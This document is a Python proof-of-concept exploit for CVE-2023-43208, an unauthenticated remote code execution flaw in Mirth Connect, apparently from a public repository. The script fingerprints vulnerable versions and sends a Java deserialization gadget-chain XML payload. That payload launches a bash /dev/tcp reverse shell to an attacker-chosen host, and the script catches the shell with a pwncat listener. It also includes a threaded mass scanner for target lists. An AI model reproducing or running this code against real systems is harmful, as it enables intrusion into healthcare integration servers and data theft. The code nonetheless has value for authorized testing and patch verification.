README.md
Rendering markdown...
import os
import time
import socket
import argparse
import requests
import threading
import pwncat.manager
from packaging import version
from rich.console import Console
from alive_progress import alive_bar
from concurrent.futures import ThreadPoolExecutor, as_completed
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
class MirthConnectExploit:
def __init__(self):
self.console = Console()
self.execution_process = "/api/users"
self.grab_version = "/api/server/version"
self.headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0",
"X-Requested-With": "OpenAPI",
"Content-Type": "application/xml",
}
self.output_file = None
def custom_print(self, message: str, header: str) -> None:
header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
self.console.print(
f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}"
)
def ascii_art(self):
art_texts = [
" ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██ ██ ██████ ██████ ██████ █████",
"██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██",
"██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ ███████ █████ █████ ██ ██ ██ █████",
"██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██",
" ██████ ████ ███████ ███████ ██████ ███████ ██████ ██ ██████ ███████ ██████ █████",
]
print()
for text in art_texts:
self.custom_print(f"[bold bright_green]{text}[/bold bright_green]", "*")
print()
self.custom_print(
"Coded By: K3ysTr0K3R and Chocapikk ( NSA, we're still waiting :D )", "+"
)
print()
def start_listener(self, timeout=10) -> None:
with socket.create_server(("0.0.0.0", int(self.rshell_port))) as listener:
listener.settimeout(timeout)
self.custom_print(
f"Waiting for incoming connection on port {self.rshell_port}...", "*"
)
try:
victim, victim_addr = listener.accept()
self.revshell_connected = True
self.custom_print(
f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+"
)
with pwncat.manager.Manager() as manager:
session = manager.create_session(
platform="linux", protocol="socket", client=victim
)
self.custom_print("Dropping to pwncat prompt...", "+")
manager.interactive()
except socket.timeout:
self.custom_print(
f"No reverse shell connection received within {timeout} seconds.",
"-",
)
def detect_mirth_connect(self, target):
self.custom_print("Looking for Mirth Connect instance...", "*")
try:
response = requests.get(target, timeout=10, verify=False)
if "Mirth Connect Administrator" in response.text:
self.custom_print("Found Mirth Connect instance", "+")
return True
else:
self.custom_print("Mirth Connect not found", "-")
except requests.exceptions.RequestException as e:
self.custom_print(f"Error while trying to connect to {target}: {e}", "-")
return False
def is_vulnerable_version(self, version_str):
parsed_version = version.parse(version_str)
if isinstance(parsed_version, version.Version):
fixed_version = version.parse("4.4.1")
if parsed_version < fixed_version:
return version_str
def detect_vuln(self, target):
if self.detect_mirth_connect(target):
try:
response = requests.get(
target + self.grab_version,
headers=self.headers,
timeout=10,
verify=False,
)
if response and self.is_vulnerable_version(response.text):
self.custom_print(
f"Vulnerable Mirth Connect version {response.text} instance found at {target}",
"+",
)
return True
except requests.exceptions.RequestException as e:
self.custom_print(
f"Error fetching version information from {target}: {e}", "-"
)
return False
@staticmethod
def build_xml_payload(command):
command = command.replace("&", "&")
command = command.replace("<", "<")
command = command.replace(">", ">")
command = command.replace('"', """)
command = command.replace("'", "'")
xml_data = f"""
<sorted-set>
<string>abcd</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler">
<target class="org.apache.commons.collections4.functors.ChainedTransformer">
<iTransformers>
<org.apache.commons.collections4.functors.ConstantTransformer>
<iConstant class="java-class">java.lang.Runtime</iConstant>
</org.apache.commons.collections4.functors.ConstantTransformer>
<org.apache.commons.collections4.functors.InvokerTransformer>
<iMethodName>getMethod</iMethodName>
<iParamTypes>
<java-class>java.lang.String</java-class>
<java-class>[Ljava.lang.Class;</java-class>
</iParamTypes>
<iArgs>
<string>getRuntime</string>
<java-class-array/>
</iArgs>
</org.apache.commons.collections4.functors.InvokerTransformer>
<org.apache.commons.collections4.functors.InvokerTransformer>
<iMethodName>invoke</iMethodName>
<iParamTypes>
<java-class>java.lang.Object</java-class>
<java-class>[Ljava.lang.Object;</java-class>
</iParamTypes>
<iArgs>
<null/>
<object-array/>
</iArgs>
</org.apache.commons.collections4.functors.InvokerTransformer>
<org.apache.commons.collections4.functors.InvokerTransformer>
<iMethodName>exec</iMethodName>
<iParamTypes>
<java-class>java.lang.String</java-class>
</iParamTypes>
<iArgs>
<string>{command}</string>
</iArgs>
</org.apache.commons.collections4.functors.InvokerTransformer>
</iTransformers>
</target>
<methodName>transform</methodName>
<eventTypes>
<string>compareTo</string>
</eventTypes>
</handler>
</dynamic-proxy>
</sorted-set>
"""
return xml_data
def exploit(self, target, lhost, lport):
if self.detect_vuln(target):
command = f"sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/{lhost}/{lport};sh <&53 >&53 2>&53'"
self.custom_print(command, "!")
xml_data = self.build_xml_payload(command)
try:
self.custom_print(f"Launching exploit against {target}...", "*")
try:
response = requests.post(
target + self.execution_process,
headers=self.headers,
data=xml_data,
timeout=20,
verify=False,
)
except requests.exceptions.RequestException as e:
self.custom_print(f"Exploit failed for {target}: {e}", "-")
except requests.exceptions.RequestException:
self.custom_print(f"Exploit failed for {target}", "-")
def shell_opened(self, target, lhost, lport, bindport=None, timeout=10):
self.rshell_port = bindport if bindport is not None else lport
self.custom_print(
f"Setting up listener on {lhost}:{self.rshell_port} and launching exploit...",
"*",
)
listener_thread = threading.Thread(target=self.start_listener, args=(timeout,))
listener_thread.start()
time.sleep(1)
self.exploit(target, lhost, lport)
listener_thread.join()
def scanner(self, target):
try:
response = requests.get(
target + self.grab_version,
headers=self.headers,
timeout=10,
verify=False,
)
vuln_version = self.is_vulnerable_version(response.text)
if vuln_version:
self.custom_print(
f"Vulnerability Detected | [bold bright_yellow]{target:<60}[/bold bright_yellow] | Server Version: [bold cyan]{vuln_version:<15}[/bold cyan]",
"+",
)
if self.output_file:
with open(self.output_file, "a") as file:
file.write(target + "\n")
except requests.exceptions.RequestException:
pass
def scan_from_file(self, target_file, threads):
if not os.path.exists(target_file):
self.custom_print(f"File not found: {target_file}", "-")
return
with open(target_file, "r") as url_file:
urls = [url.strip() for url in url_file.readlines()]
if not urls:
return
with alive_bar(
len(urls), title="Scanning Targets", bar="smooth", enrich_print=False
) as bar:
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = [executor.submit(self.scanner, url) for url in urls]
for future in as_completed(futures):
bar()
def run(self):
parser = argparse.ArgumentParser(
description="A PoC exploit for CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)"
)
parser.add_argument("-u", "--url", help="Target URL to exploit")
parser.add_argument("-lh", "--lhost", help="Listening host")
parser.add_argument("-lp", "--lport", help="Listening port")
parser.add_argument(
"-bp",
"--bindport",
type=int,
help="Port for the bind listener (useful with ngrok)",
)
parser.add_argument("-f", "--file", help="File containing target URLs to scan")
parser.add_argument(
"-o", "--output", help="Output file for saving scan results"
)
parser.add_argument(
"-t",
"--threads",
default=50,
type=int,
help="Number of threads to use for scanning",
)
args = parser.parse_args()
self.output_file = args.output
match (args.url, args.lhost, args.lport, args.file):
case (url, lhost, lport, None) if url and lhost and lport:
self.shell_opened(url, lhost, lport, args.bindport)
case (None, None, None, file) if file:
self.scan_from_file(file, args.threads)
case _:
parser.print_help()
if __name__ == "__main__":
exploit_tool = MirthConnectExploit()
exploit_tool.ascii_art()
exploit_tool.run()